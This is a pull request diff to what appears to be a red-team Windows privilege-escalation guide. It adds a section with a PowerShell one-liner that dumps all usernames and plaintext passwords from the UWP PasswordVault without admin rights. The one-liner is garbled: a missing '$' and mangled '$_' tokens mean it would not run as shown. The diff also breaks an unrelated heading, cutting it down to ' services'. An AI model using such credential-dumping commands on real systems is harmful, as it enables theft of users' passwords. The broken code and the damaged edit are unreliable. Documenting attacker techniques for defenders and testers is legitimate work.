### PR TITLE
feat(windows lpe): add UWP PasswordVault credential locker method

### DIFF
--- a/docs/redteam/escalation/windows-privilege-escalation.md
+++ b/docs/redteam/escalation/windows-privilege-escalation.md
@@ -20,6 +20,7 @@
     * [Sticky Notes passwords](#sticky-notes-passwords)
     * [Passwords stored in services](#passwords-stored-in-services)
     * [Passwords stored in Key Manager](#passwords-stored-in-key-manager)
+    * [Passwords stored in UWP PasswordVault / Credential Locker](#passwords-stored-in-uwp-passwordvault--credential-locker)
     * [Powershell History](#powershell-history)
     * [Powershell Transcript](#powershell-transcript)
     * [Password in Alternate Data Stream](#password-in-alternate-data-stream)
@@ -519,7 +520,7 @@ cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| fi
 
 The sticky notes app stores it's content in a sqlite db located at `C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite`
 
-### Passwords stored in services
+###  services
 
 Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher)
 
@@ -536,6 +537,16 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
 
 ```ps1
 rundll32 keymgr,KRShowKeyMgr
+```
+
+### Passwords stored in UWP PasswordVault / Credential Locker
+
+Modern Windows UWP applications, Microsoft Edge, and modern system services store authentication tokens and plaintext passwords inside the Universal Windows Platform (UWP) `PasswordVault` (also exposed as `Web Credentials` in `vaultcmd`). This storage space is session-isolated and can be decrypted natively without administrative or `SeDebugPrivilege` rights.
+
+Execute this PowerShell command inside the user's active session to instantly dump and decrypt all stored usernames and plaintext passwords:
+
+```ps1
+[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]; v = New-Object Windows.Security.Credentials.PasswordVault; v.RetrieveAll() | ForEach-Object { try { \(_.RetrievePassword();\)_ } catch{} } | Select-Object Resource, UserName, Password | Format-List
 ```
 
 ### Powershell History


### PR DESCRIPTION
Adds a new section documenting the extraction of credentials from the modern Universal Windows Platform (UWP) PasswordVault / Credential Locker. 

- Documents how modern Windows builds, Edge, and apps handle "Web Credentials".
- Provides a native PowerShell one-liner to securely decrypt and display plaintext passwords without requiring administrative or debug privileges.